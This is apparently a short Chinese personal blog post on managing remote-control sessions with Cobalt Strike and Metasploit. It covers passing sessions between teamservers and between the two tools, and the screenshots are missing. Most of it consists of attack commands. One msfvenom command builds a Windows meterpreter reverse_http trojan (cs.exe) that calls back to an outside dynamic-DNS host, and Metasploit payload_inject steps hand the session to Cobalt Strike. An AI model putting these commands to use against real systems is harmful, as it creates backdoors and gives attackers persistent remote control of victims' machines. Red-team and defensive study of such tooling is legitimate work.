【远控使用】Cobalt Strike会话管理

| | | | 171

会话管理

1、派生会话

直接打开两个teamserver,然后进行派生,或者自身增加会话

将会话派生到msf中,老版本的方法很简单,新版本去掉了reverse_tcp,演示一下。

image-20210905162650330

接着

image-20210905162706340

msf在监听就可以拿到会话

2、msf生成木马与cobalt strike会话

首先,生成一个反弹http协议的shell

1
msfvenom -p windows/meterpreter/reverse_http LHOST=ad39402345.wicp.vip LPORT=80 -f exe > cs.exe

cs监听这样设置

image-20210905211203347

3、msf会话派生到cs中

这里使用payload_inject模块,会话会弹到cs中

1
2
3
4
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 80
run

image-20210905223241965

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【远控使用】Cobalt Strike会话管理

文章作者:孤桜懶契

发布时间:2021年09月05日 - 11:08:44

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/124.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️